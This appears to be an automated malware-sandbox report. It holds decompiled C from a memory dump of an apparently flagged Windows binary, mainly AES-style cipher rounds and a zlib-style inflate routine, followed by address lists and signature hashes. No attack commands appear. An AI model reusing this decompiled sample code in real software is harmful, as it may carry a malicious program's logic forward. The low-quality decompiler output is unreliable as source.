                                                            				_v8 = _t303;
                                                            				_t172[8] =  *0x004089FC ^ _t303 >> 0x00000018;
                                                            				_t172[9] =  *0x004089FC ^ _v8 >> 0x00000010;
                                                            				_t172[0xa] =  *0x004089FC ^ _v8 >> 0x00000008;
                                                            				_t263 = _t262 & 0x000000ff;
                                                            				_t172[0xb] =  *((_v16 & 0x000000ff) + 0x4089fc) ^ _v8;
                                                            				_t137 = _t345 + 0xc; // 0x41c1950f
                                                            				_t346 =  *_t137;
                                                            				_v8 = _t346;
                                                            				_t172[0xc] =  *0x004089FC ^ _t346 >> 0x00000018;
                                                            				_t172[0xd] =  *0x004089FC ^ _t346 >> 0x00000010;
                                                            				_t172[0xe] =  *0x004089FC ^ _t346 >> 0x00000008;
                                                            				_t148 = _t263 + 0x4089fc; // 0x6bf27b77
                                                            				_t172[0xf] =  *_t148 ^ _v8;
                                                            				return _t172;
                                                            			}










































                                                            0x00402e85
                                                            0x00402e87
                                                            0x00402e8e
                                                            0x00402e98
                                                            0x00402ea1
                                                            0x00402ea6
                                                            0x00402ea7
                                                            0x00402ea7
                                                            0x00402eac
                                                            0x00402eca
                                                            0x00402ed4
                                                            0x00402ed5
                                                            0x00402ee0
                                                            0x00402eef
                                                            0x00402ef5
                                                            0x00402eff
                                                            0x00402f00
                                                            0x00402f11
                                                            0x00402f17
                                                            0x00402f18
                                                            0x00402f26
                                                            0x00402f36
                                                            0x00402f3e
                                                            0x00402f4c
                                                            0x00402f4f
                                                            0x00402f59
                                                            0x00402f5c
                                                            0x00402f5f
                                                            0x00402fbf
                                                            0x00402fcc
                                                            0x00402fd6
                                                            0x00403016
                                                            0x00403031
                                                            0x0040303b
                                                            0x0040303e
                                                            0x00403041
                                                            0x00403044
                                                            0x00403044
                                                            0x00403047
                                                            0x00403047
                                                            0x00403050
                                                            0x00403053
                                                            0x00403053
                                                            0x00403056
                                                            0x00403059
                                                            0x00403059
                                                            0x0040305d
                                                            0x0040305d
                                                            0x00403068
                                                            0x00403078
                                                            0x0040307b
                                                            0x0040308f
                                                            0x0040309a
                                                            0x004030a4
                                                            0x004030b8
                                                            0x004030bb
                                                            0x004030bb
                                                            0x004030c4
                                                            0x004030d1
                                                            0x004030e5
                                                            0x004030fa
                                                            0x0040310e
                                                            0x00403111
                                                            0x00403111
                                                            0x0040311a
                                                            0x00403127
                                                            0x0040313b
                                                            0x0040314e
                                                            0x00403154
                                                            0x00403162
                                                            0x00403165
                                                            0x00403165
                                                            0x0040316f
                                                            0x0040317f
                                                            0x00403194
                                                            0x004031a8
                                                            0x004031ab
                                                            0x004031b5
                                                            0x004031b9

                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402E98
                                                            • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00403554,00000002,?,?,?,?), ref: 00402EA7
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrow
                                                            • String ID:
                                                            • API String ID: 941485209-0
                                                            • Opcode ID: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
                                                            • Instruction ID: 7c46eb61736c4a52f21da4615b0110659747632e7974af7727d2e67ead4b8ec0
                                                            • Opcode Fuzzy Hash: 0b3a82e1866a10e008d9e23789663a186783f6e7ea65f1ebfadb5e40c8bf56e2
                                                            • Instruction Fuzzy Hash: 01B1AD75A081D99EDB05CFB989A04EAFFF2AF4E20474ED1E9C5C4AB313C5306505DB98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 33%
                                                            			E004031BC(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
                                                            				signed int _v8;
                                                            				void* _v9;
                                                            				void* _v10;
                                                            				void* _v11;
                                                            				signed int _v12;
                                                            				void* _v13;
                                                            				void* _v14;
                                                            				void* _v15;
                                                            				signed int _v16;
                                                            				void* _v17;
                                                            				void* _v18;
                                                            				void* _v19;
                                                            				signed int _v20;
                                                            				void* _v21;
                                                            				void* _v22;
                                                            				signed int _v24;
                                                            				signed int _v28;
                                                            				intOrPtr _v32;
                                                            				signed int _v36;
                                                            				char _v48;
                                                            				signed char* _t154;
                                                            				signed char* _t157;
                                                            				signed char* _t158;
                                                            				signed char* _t161;
                                                            				signed char* _t162;
                                                            				signed char* _t165;
                                                            				signed int _t169;
                                                            				signed int _t170;
                                                            				signed char* _t175;
                                                            				signed int _t243;
                                                            				signed int _t278;
                                                            				signed int _t288;
                                                            				signed int _t302;
                                                            				signed int* _t328;
                                                            				signed int _t332;
                                                            				signed int* _t342;
                                                            				intOrPtr _t343;
                                                            				void* _t344;
                                                            				signed int _t345;
                                                            
                                                            				_t343 = __ecx;
                                                            				_v32 = __ecx;
                                                            				if( *((char*)(__ecx + 4)) == 0) {
                                                            					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                            					_push(0x40d570);
                                                            					_push( &_v48);
                                                            					L0040776E();
                                                            				}
                                                            				_t154 = _a4;
                                                            				_t157 =  &(_t154[3]);
                                                            				_t158 =  &(_t157[1]);
                                                            				_t243 = (( *_t154 & 0x000000ff) << 0x00000018 | (_t154[1] & 0x000000ff) << 0x00000010 |  *_t157 & 0x000000ff) ^  *(_t343 + 0x1e8);
                                                            				_v24 = _t243;
                                                            				_t161 =  &(_t158[3]);
                                                            				_t162 =  &(_t161[1]);
                                                            				_v20 = ((_t157[1] & 0x000000ff) << 0x00000018 | (_t158[1] & 0x000000ff) << 0x00000010 |  *_t161 & 0x000000ff) ^  *(_t343 + 0x1ec);
                                                            				_t165 =  &(_t162[3]);
                                                            				_t166 =  &(_t165[1]);
                                                            				_v16 = (( *_t162 & 0x000000ff) << 0x00000018 | (_t162[1] & 0x000000ff) << 0x00000010 |  *_t165 & 0x000000ff) ^  *(_t343 + 0x1f0);
                                                            				_t169 =  *(_t343 + 0x410);
                                                            				_v36 = _t169;
                                                            				_v12 = ((_t165[1] & 0x000000ff) << 0x00000018 | (_t166[1] & 0x000000ff) << 0x00000010) ^  *(_t343 + 0x1f4);
                                                            				if(_t169 > 1) {
                                                            					_t328 = _t343 + 0x210;
                                                            					_a4 = _t328;
                                                            					_v8 = _t169 - 1;
                                                            					do {
                                                            						_t332 =  *0x00409BFC ^  *0x00409FFC;
                                                            						_v28 = _t332;
                                                            						_v28 = _t332 ^  *0x0040A3FC ^  *(0x40a7fc + (_t243 & 0x000000ff) * 4) ^ _a4[1];
                                                            						_v16 =  *0x00409BFC ^  *0x00409FFC ^  *0x0040A3FC ^  *(0x40a7fc + (_v12 & 0x000000ff) * 4) ^  *_t328;
                                                            						_v12 = _v28;
                                                            						_v20 =  *0x0040A3FC ^  *0x00409BFC ^  *0x00409FFC ^  *(0x40a7fc + (_v16 & 0x000000ff) * 4) ^  *(_t328 - 4);
                                                            						_t342 = _a4;
                                                            						_t243 =  *0x00409FFC ^  *0x0040A3FC ^  *0x00409BFC ^  *(0x40a7fc + (_v20 & 0x000000ff) * 4) ^  *(_t342 - 8);
                                                            						_t328 = _t342 + 0x20;
                                                            						_t82 =  &_v8;
                                                            						 *_t82 = _v8 - 1;
                                                            						_a4 = _t328;
                                                            						_v24 = _t243;
                                                            					} while ( *_t82 != 0);
                                                            					_t343 = _v32;
                                                            					_t169 = _v36;
                                                            				}
                                                            				_t170 = _t169 << 5;
                                                            				_t278 =  *(_t343 + 0x1e8 + _t170);
                                                            				_t344 = _t343 + 0x1e8 + _t170;
                                                            				_v8 = _t278;
                                                            				_t175 = _a8;
                                                            				 *_t175 =  *0x00408AFC ^ _t278 >> 0x00000018;
                                                            				_t175[1] =  *0x00408AFC ^ _t278 >> 0x00000010;
                                                            				_t175[2] =  *0x00408AFC ^ _v8 >> 0x00000008;
                                                            				_t175[3] =  *((_v20 & 0x000000ff) + 0x408afc) ^ _v8;
                                                            				_t288 =  *(_t344 + 4);
                                                            				_v8 = _t288;
                                                            				_t175[4] =  *0x00408AFC ^ _t288 >> 0x00000018;
                                                            				_t175[5] =  *0x00408AFC ^ _v8 >> 0x00000010;
                                                            				_t175[6] =  *0x00408AFC ^ _v8 >> 0x00000008;
                                                            				_t175[7] =  *((_v16 & 0x000000ff) + 0x408afc) ^ _v8;
                                                            				_t302 =  *(_t344 + 8);
                                                            				_v8 = _t302;
                                                            				_t175[8] =  *0x00408AFC ^ _t302 >> 0x00000018;
                                                            				_t175[9] =  *0x00408AFC ^ _v8 >> 0x00000010;
                                                            				_t175[0xa] =  *0x00408AFC ^ _v8 >> 0x00000008;
                                                            				_t175[0xb] =  *((_v12 & 0x000000ff) + 0x408afc) ^ _v8;
                                                            				_t345 =  *(_t344 + 0xc);
                                                            				_v8 = _t345;
                                                            				_t175[0xc] =  *0x00408AFC ^ _t345 >> 0x00000018;
                                                            				_t175[0xd] =  *0x00408AFC ^ _t345 >> 0x00000010;
                                                            				_t175[0xe] =  *0x00408AFC ^ _t345 >> 0x00000008;
                                                            				_t175[0xf] =  *((_t243 & 0x000000ff) + 0x408afc) ^ _v8;
                                                            				return _t175;
                                                            			}










































                                                            0x004031c3
                                                            0x004031c5
                                                            0x004031cc
                                                            0x004031d6
                                                            0x004031df
                                                            0x004031e4
                                                            0x004031e5
                                                            0x004031e5
                                                            0x004031ea
                                                            0x00403206
                                                            0x00403210
                                                            0x00403211
                                                            0x0040321f
                                                            0x0040322e
                                                            0x00403234
                                                            0x0040323f
                                                            0x00403255
                                                            0x0040325b
                                                            0x00403266
                                                            0x0040327d
                                                            0x00403285
                                                            0x00403296
                                                            0x00403299
                                                            0x0040329f
                                                            0x004032a6
                                                            0x004032a9
                                                            0x004032ac
                                                            0x00403323
                                                            0x0040332f
                                                            0x0040334b
                                                            0x0040335a
                                                            0x0040336c
                                                            0x0040337b
                                                            0x00403385
                                                            0x00403388
                                                            0x0040338b
                                                            0x0040338e
                                                            0x0040338e
                                                            0x00403391
                                                            0x00403394
                                                            0x00403394
                                                            0x0040339d
                                                            0x004033a0
                                                            0x004033a0
                                                            0x004033a3
                                                            0x004033a6
                                                            0x004033ad
                                                            0x004033bb
                                                            0x004033cb
                                                            0x004033ce
                                                            0x004033e5
                                                            0x004033f8
                                                            0x0040340c
                                                            0x0040340f
                                                            0x00403418
                                                            0x00403425
                                                            0x00403439
                                                            0x0040344e
                                                            0x00403462
                                                            0x00403465
                                                            0x0040346e
                                                            0x0040347b
                                                            0x0040348f
                                                            0x004034a1
                                                            0x004034b5
                                                            0x004034b8
                                                            0x004034c2
                                                            0x004034d2
                                                            0x004034e7
                                                            0x004034fb
                                                            0x00403508
                                                            0x0040350c

                                                            APIs
                                                            • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031D6
                                                            • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,004037DC,00000002,?,?,?,?), ref: 004031E5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.357030514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.357020258.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357044183.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357064326.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000002.00000002.357098340.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ??0exception@@ExceptionThrow
                                                            • String ID:
                                                            • API String ID: 941485209-0
                                                            • Opcode ID: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
                                                            • Instruction ID: bcf4991698fce177fafabfcfbf4d003d7da0a1e91b0dfae35dbc96c431f9713a
                                                            • Opcode Fuzzy Hash: 0dda08770b2cfa47ca0284abc8234425fc657ac4a7c18576e4d0461ed08ab4c9
                                                            • Instruction Fuzzy Hash: 43B1A135A081D99EDB05CFB984A04EAFFF2AF8E200B4ED1E6C9D4AB713C5705615DB84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E004043B7() {
                                                            				void* __ebx;
                                                            				void** __edi;
                                                            				void* __esi;
                                                            				signed int _t426;
                                                            				signed int _t427;
                                                            				void* _t434;
                                                            				signed int _t436;
                                                            				unsigned int _t438;
                                                            				void* _t442;
                                                            				void* _t448;
                                                            				void* _t455;
                                                            				signed int _t456;
                                                            				signed int _t461;
                                                            				signed char* _t476;
                                                            				signed int _t482;
                                                            				signed int _t485;
                                                            				signed int* _t488;
                                                            				void* _t490;
                                                            				void* _t492;
                                                            				void* _t493;
                                                            
                                                            				_t490 = _t492;
                                                            				_t493 = _t492 - 0x2c;
                                                            				_t488 =  *(_t490 + 8);
                                                            				_t485 =  *(_t490 + 0xc);
                                                            				_t482 = _t488[0xd];
                                                            				_t476 =  *_t485;
                                                            				 *(_t490 - 4) =  *(_t485 + 4);
                                                            				 *(_t490 + 8) = _t488[8];
                                                            				 *(_t490 + 0xc) = _t488[7];
                                                            				_t426 = _t488[0xc];
                                                            				 *(_t490 - 8) = _t482;
                                                            				if(_t482 >= _t426) {
                                                            					_t479 = _t488[0xb] - _t482;
                                                            					__eflags = _t479;
                                                            				} else {
                                                            					_t479 = _t426 - _t482 - 1;
                                                            				}
                                                            				_t427 =  *_t488;
                                                            				 *(_t490 - 0x10) = _t479;
                                                            				if(_t427 > 9) {
                                                            					L99:
                                                            					_push(0xfffffffe);
                                                            					_t488[8] =  *(_t490 + 8);
                                                            					_t488[7] =  *(_t490 + 0xc);
                                                            					 *(_t485 + 4) =  *(_t490 - 4);
                                                            					 *_t485 = _t476;
                                                            					_t320 = _t485 + 8;
                                                            					 *_t320 =  *(_t485 + 8) + _t476 -  *_t485;
                                                            					__eflags =  *_t320;
                                                            					_t488[0xd] =  *(_t490 - 8);
                                                            					goto L100;
                                                            				} else {
                                                            					while(1) {
                                                            						switch( *((intOrPtr*)(_t427 * 4 +  &M00404BBD))) {
                                                            							case 0:
                                                            								goto L7;
                                                            							case 1:
                                                            								goto L20;
                                                            							case 2:
                                                            								goto L27;
                                                            							case 3:
                                                            								goto L50;
                                                            							case 4:
                                                            								goto L58;
                                                            							case 5:
                                                            								goto L68;
                                                            							case 6:
                                                            								goto L92;
                                                            							case 7:
                                                            								goto L118;
                                                            							case 8:
                                                            								goto L122;
                                                            							case 9:
                                                            								goto L104;
                                                            						}
                                                            						L92:
                                                            						__eax =  *(__ebp + 8);
                                                            						 *(__esi + 0x20) =  *(__ebp + 8);
                                                            						__eax =  *(__ebp + 0xc);
                                                            						 *(__esi + 0x1c) =  *(__ebp + 0xc);
                                                            						__eax =  *(__ebp - 4);
                                                            						__edi[1] =  *(__ebp - 4);
                                                            						__ebx = __ebx -  *__edi;
                                                            						 *__edi = __ebx;
                                                            						__edi[2] = __edi[2] + __ebx -  *__edi;
                                                            						__eax =  *(__ebp - 8);
                                                            						 *(__esi + 0x34) =  *(__ebp - 8);
                                                            						__eax = E00403CFC(__esi, __edi,  *(__ebp + 0x10));
                                                            						__eflags = __eax - 1;
                                                            						if(__eax != 1) {
                                                            							L120:
                                                            							_push(__eax);
                                                            							L100:
                                                            							_push(_t485);
                                                            							_push(_t488);
                                                            							_t434 = E00403BD6(_t479);
                                                            							L101:
                                                            							return _t434;
                                                            						}
                                                            						 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                            						E004042AF( *(__esi + 4), __edi) = __edi[1];
                                                            						__ebx =  *__edi;
                                                            						 *(__ebp - 4) = __edi[1];
                                                            						__eax =  *(__esi + 0x20);
                                                            						_pop(__ecx);
                                                            						 *(__ebp + 8) =  *(__esi + 0x20);
                                                            						__eax =  *(__esi + 0x1c);
                                                            						_pop(__ecx);
                                                            						__ecx =  *(__esi + 0x34);
                                                            						 *(__ebp + 0xc) =  *(__esi + 0x1c);
                                                            						__eax =  *(__esi + 0x30);
                                                            						 *(__ebp - 8) = __ecx;
                                                            						__eflags = __ecx - __eax;
                                                            						if(__ecx >= __eax) {
                                                            							__eax =  *(__esi + 0x2c);
                                                            							__eax =  *(__esi + 0x2c) -  *(__ebp - 8);
                                                            							__eflags = __eax;
                                                            						} else {
                                                            							__eax = __eax - __ecx;
                                                            							__eax = __eax - 1;
                                                            						}
                                                            						__eflags =  *(__esi + 0x18);
                                                            						 *(__ebp - 0x10) = __eax;
                                                            						if( *(__esi + 0x18) != 0) {
                                                            							 *__esi = 7;
                                                            							goto L118;
                                                            						} else {
                                                            							 *__esi =  *__esi & 0x00000000;
                                                            							__eflags =  *__esi;
                                                            							L98:
                                                            							_t427 =  *_t488;
                                                            							__eflags = _t427 - 9;
                                                            							if(_t427 <= 9) {
                                                            								_t479 =  *(_t490 - 0x10);
                                                            								continue;
                                                            							}
                                                            							goto L99;
                                                            						}
                                                            						while(1) {
                                                            							L68:
                                                            							__eax =  *(__esi + 4);
                                                            							__ecx =  *(__esi + 8);
                                                            							__edx = __eax;
                                                            							__eax = __eax & 0x0000001f;
                                                            							__edx = __edx >> 5;
                                                            							__edx = __edx & 0x0000001f;
                                                            							_t187 = __eax + 0x102; // 0x102
                                                            							__eax = __edx + _t187;
                                                            							__eflags = __ecx - __edx + _t187;
                                                            							if(__ecx >= __edx + _t187) {
                                                            								break;
                                                            							}
                                                            							__eax =  *(__esi + 0x10);
                                                            							while(1) {
                                                            								__eflags =  *(__ebp + 0xc) - __eax;
                                                            								if( *(__ebp + 0xc) >= __eax) {
                                                            									break;
                                                            								}
                                                            								__eflags =  *(__ebp - 4);
                                                            								if( *(__ebp - 4) == 0) {
                                                            									L107:
                                                            									_t488[8] =  *(_t490 + 8);
                                                            									_t488[7] =  *(_t490 + 0xc);
                                                            									_t349 = _t485 + 4;
                                                            									 *_t349 =  *(_t485 + 4) & 0x00000000;
                                                            									__eflags =  *_t349;
                                                            									L108:
                                                            									_push( *(_t490 + 0x10));
                                                            									 *_t485 = _t476;
                                                            									 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
                                                            									_t488[0xd] =  *(_t490 - 8);
                                                            									goto L100;
                                                            								}
                                                            								__edx =  *__ebx & 0x000000ff;
                                                            								__ecx =  *(__ebp + 0xc);
                                                            								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                            								 *(__ebp - 4) =  *(__ebp - 4) - 1;
                                                            								__edx = ( *__ebx & 0x000000ff) << __cl;
                                                            								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
                                                            								__ebx = __ebx + 1;
                                                            								 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                            							}
                                                            							__eax =  *(0x40bca8 + __eax * 4);
                                                            							__ecx =  *(__esi + 0x14);
                                                            							__eax = __eax &  *(__ebp + 8);
                                                            							__edx =  *(__ecx + 4 + __eax * 8);
                                                            							__eax = __ecx + __eax * 8;
                                                            							__eflags = __edx - 0x10;
                                                            							 *(__ebp - 0x14) = __edx;
                                                            							__ecx =  *(__eax + 1) & 0x000000ff;
                                                            							 *(__ebp - 0xc) = __ecx;
                                                            							if(__edx >= 0x10) {
                                                            								__eflags = __edx - 0x12;
                                                            								if(__edx != 0x12) {
                                                            									_t222 = __edx - 0xe; // -14
                                                            									__eax = _t222;
                                                            								} else {
                                                            									__eax = 7;
                                                            								}
                                                            								__ecx = 0;
                                                            								__eflags = __edx - 0x12;
                                                            								0 | __eflags != 0x00000000 = (__eflags != 0) - 1;
                                                            								__ecx = (__eflags != 0x00000000) - 0x00000001 & 0x00000008;
                                                            								__ecx = ((__eflags != 0x00000000) - 0x00000001 & 0x00000008) + 3;
                                                            								__eflags = __ecx;
                                                            								 *(__ebp - 0x10) = __ecx;
                                                            								while(1) {
                                                            									__ecx =  *(__ebp - 0xc);
                                                            									__edx = __eax + __ecx;
                                                            									__eflags =  *(__ebp + 0xc) - __eax + __ecx;
                                                            									if( *(__ebp + 0xc) >= __eax + __ecx) {
                                                            										break;
                                                            									}
                                                            									__eflags =  *(__ebp - 4);
                                                            									if( *(__ebp - 4) == 0) {
                                                            										goto L107;
                                                            									}
                                                            									__edx =  *__ebx & 0x000000ff;
                                                            									__ecx =  *(__ebp + 0xc);
                                                            									 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                            									 *(__ebp - 4) =  *(__ebp - 4) - 1;
                                                            									__edx = ( *__ebx & 0x000000ff) << __cl;
                                                            									 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
                                                            									__ebx = __ebx + 1;
                                                            									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 8;
                                                            								}
                                                            								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
                                                            								 *(0x40bca8 + __eax * 4) =  *(0x40bca8 + __eax * 4) &  *(__ebp + 8);
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) + ( *(0x40bca8 + __eax * 4) &  *(__ebp + 8));
                                                            								__ecx = __eax;
                                                            								 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
                                                            								__ecx =  *(__ebp - 0xc);
                                                            								__eax = __eax +  *(__ebp - 0xc);
                                                            								__ecx =  *(__esi + 8);
                                                            								 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
                                                            								__eax =  *(__esi + 4);
                                                            								__edx = __eax;
                                                            								__eax = __eax & 0x0000001f;
                                                            								__edx = __edx >> 5;
                                                            								__edx = __edx & 0x0000001f;
                                                            								_t254 = __eax + 0x102; // 0x102
                                                            								__eax = __edx + _t254;
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) + __ecx;
                                                            								__eflags =  *(__ebp - 0x10) + __ecx - __eax;
                                                            								if( *(__ebp - 0x10) + __ecx > __eax) {
                                                            									L111:
                                                            									__edi[9](__edi[0xa],  *(__esi + 0xc)) =  *(__ebp + 8);
                                                            									 *__esi = 9;
                                                            									__edi[6] = "invalid bit length repeat";
                                                            									 *(__esi + 0x20) =  *(__ebp + 8);
                                                            									__eax =  *(__ebp + 0xc);
                                                            									 *(__esi + 0x1c) =  *(__ebp + 0xc);
                                                            									__eax =  *(__ebp - 4);
                                                            									__edi[1] =  *(__ebp - 4);
                                                            									__ebx = __ebx -  *__edi;
                                                            									 *__edi = __ebx;
                                                            									__edi[2] = __edi[2] + __ebx -  *__edi;
                                                            									__eax =  *(__ebp - 8);
                                                            									 *(__esi + 0x34) =  *(__ebp - 8);
                                                            									__eax = E00403BD6(__ecx, __esi, __edi, 0xfffffffd);
                                                            									goto L101;
                                                            								}
                                                            								__eflags =  *(__ebp - 0x14) - 0x10;
                                                            								if( *(__ebp - 0x14) != 0x10) {
                                                            									__eax = 0;
                                                            									__eflags = 0;
                                                            									do {
                                                            										L87:
                                                            										__edx =  *(__esi + 0xc);
                                                            										 *( *(__esi + 0xc) + __ecx * 4) = __eax;
                                                            										__ecx = __ecx + 1;
                                                            										_t264 = __ebp - 0x10;
                                                            										 *_t264 =  *(__ebp - 0x10) - 1;
                                                            										__eflags =  *_t264;
                                                            									} while ( *_t264 != 0);
                                                            									 *(__esi + 8) = __ecx;
                                                            									continue;
                                                            								}
                                                            								__eflags = __ecx - 1;
                                                            								if(__ecx < 1) {
                                                            									goto L111;
                                                            								}
                                                            								__eax =  *(__esi + 0xc);
                                                            								__eax =  *( *(__esi + 0xc) + __ecx * 4 - 4);
                                                            								goto L87;
                                                            							}
                                                            							 *(__ebp + 8) =  *(__ebp + 8) >> __cl;
                                                            							__eax = __ecx;
                                                            							__ecx =  *(__esi + 0xc);
                                                            							 *(__ebp + 0xc) =  *(__ebp + 0xc) - __eax;
                                                            							__eax =  *(__esi + 8);
                                                            							 *( *(__esi + 0xc) +  *(__esi + 8) * 4) = __edx;
                                                            							 *(__esi + 8) =  *(__esi + 8) + 1;
                                                            						}
                                                            						__ecx = __ebp - 0x28;
                                                            						__eax =  *(__esi + 4);
                                                            						 *(__esi + 0x14) =  *(__esi + 0x14) & 0x00000000;
                                                            						 *(__ebp - 0x14) = 9;
                                                            						__ebp - 0x2c = __ebp - 0x10;
                                                            						__ecx = __ebp - 0x14;
                                                            						__ecx = __eax;
                                                            						__eax = __eax & 0x0000001f;
                                                            						__ecx = __ecx >> 5;
                                                            						__ecx = __ecx & 0x0000001f;
                                                            						__eax = __eax + 0x101;
                                                            						__ecx = __ecx + 1;
                                                            						 *(__ebp - 0x10) = 6;
                                                            						__eax = E0040501F(__eax, __ecx,  *(__esi + 0xc), __ebp - 0x14, __ebp - 0x10, __ebp - 0x2c, __ebp - 0x28,  *((intOrPtr*)(__esi + 0x24)), __edi);
                                                            						 *(__ebp - 0xc) = __eax;
                                                            						__eflags = __eax;
                                                            						if(__eax != 0) {
                                                            							__eflags =  *(__ebp - 0xc) - 0xfffffffd;
                                                            							L113:
                                                            							if(__eflags == 0) {
                                                            								__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
                                                            								_pop(__ecx);
                                                            								 *__esi = 9;
                                                            								_pop(__ecx);
                                                            							}
                                                            							__eax =  *(__ebp + 8);
                                                            							_push( *(__ebp - 0xc));
                                                            							 *(__esi + 0x20) =  *(__ebp + 8);
                                                            							__eax =  *(__ebp + 0xc);
                                                            							 *(__esi + 0x1c) =  *(__ebp + 0xc);
                                                            							__eax =  *(__ebp - 4);
                                                            							__edi[1] =  *(__ebp - 4);
                                                            							__ebx = __ebx -  *__edi;
                                                            							 *__edi = __ebx;
                                                            							__edi[2] = __edi[2] + __ebx -  *__edi;
                                                            							__eax =  *(__ebp - 8);
                                                            							 *(__esi + 0x34) =  *(__ebp - 8);
                                                            							goto L100;
                                                            						}
                                                            						__eax = E00403CC8( *(__ebp - 0x14),  *(__ebp - 0x10),  *((intOrPtr*)(__ebp - 0x2c)),  *(__ebp - 0x28), __edi);
                                                            						__eflags = __eax;
                                                            						if(__eax == 0) {
                                                            							L116:
                                                            							_push(0xfffffffc);
                                                            							_t488[8] =  *(_t490 + 8);
                                                            							_t488[7] =  *(_t490 + 0xc);
                                                            							 *(_t485 + 4) =  *(_t490 - 4);
                                                            							 *_t485 = _t476;
                                                            							 *(_t485 + 8) =  *(_t485 + 8) + _t476 -  *_t485;
                                                            							_t488[0xd] =  *(_t490 - 8);
                                                            							goto L100;
                                                            						}
                                                            						 *(__esi + 4) = __eax;
                                                            						__eax = __edi[9](__edi[0xa],  *(__esi + 0xc));
                                                            						_pop(__ecx);
                                                            						 *__esi = 6;
                                                            						_pop(__ecx);
                                                            						goto L92;
                                                            						L58:
                                                            						 *(__esi + 4) =  *(__esi + 4) >> 0xa;
                                                            						__eax = ( *(__esi + 4) >> 0xa) + 4;
                                                            						__eflags =  *(__esi + 8) - ( *(__esi + 4) >> 0xa) + 4;
                                                            						if( *(__esi + 8) >= ( *(__esi + 4) >> 0xa) + 4) {
                                                            							while(1) {
                                                            								L64:
                                                            								__eflags =  *(__esi + 8) - 0x13;
                                                            								if( *(__esi + 8) >= 0x13) {
                                                            									break;
                                                            								}
                                                            								__eax =  *(__esi + 8);
                                                            								__ecx =  *(__esi + 0xc);
                                                            								 *(__ecx +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) =  *( *(__esi + 0xc) +  *(0x40cdf0 +  *(__esi + 8) * 4) * 4) & 0x00000000;
                                                            								 *(__esi + 8) =  *(__esi + 8) + 1;
                                                            							}
                                                            							__ecx = __esi + 0x14;
                                                            							__eax = __esi + 0x10;
                                                            							 *(__esi + 0x10) = 7;
                                                            							__eax = E00404FA0( *(__esi + 0xc), __eax, __ecx,  *((intOrPtr*)(__esi + 0x24)), __edi);
                                                            							 *(__ebp - 0xc) = __eax;
                                                            							__eflags = __eax;
                                                            							if(__eax != 0) {
                                                            								__eflags =  *(__ebp - 0xc) - 0xfffffffd;
                                                            								goto L113;
                                                            							}
                                                            							_t182 = __esi + 8;
                                                            							 *_t182 =  *(__esi + 8) & __eax;
                                                            							__eflags =  *_t182;
                                                            							 *__esi = 5;
                                                            							goto L68;
                                                            						} else {
                                                            							goto L59;
                                                            						}
                                                            						do {
                                                            							L59:
                                                            							__ecx =  *(__ebp + 0xc);
                                                            							while(1) {
                                                            								__eflags = __ecx - 3;
                                                            								if(__ecx >= 3) {
                                                            									goto L63;
                                                            								}
                                                            								__eflags =  *(__ebp - 4);
                                                            								if( *(__ebp - 4) == 0) {
                                                            									goto L107;
                                                            								}
                                                            								__eax =  *__ebx & 0x000000ff;
                                                            								 *(__ebp + 0x10) =  *(__ebp + 0x10) & 0x00000000;
                                                            								 *(__ebp - 4) =  *(__ebp - 4) - 1;
                                                            								__eax = ( *__ebx & 0x000000ff) << __cl;
                                                            								 *(__ebp + 8) =  *(__ebp + 8) | ( *__ebx & 0x000000ff) << __cl;
                                                            								__ebx = __ebx + 1;
                                                            								__ecx = __ecx + 8;
                                                            								 *(__ebp + 0xc) = __ecx;
                                                            							}
                                                            							L63:
                                                            							__ecx =  *(__esi + 8);
                                                            							__eax =  *(__ebp + 8);
                                                            							__edx =  *(__esi + 0xc);
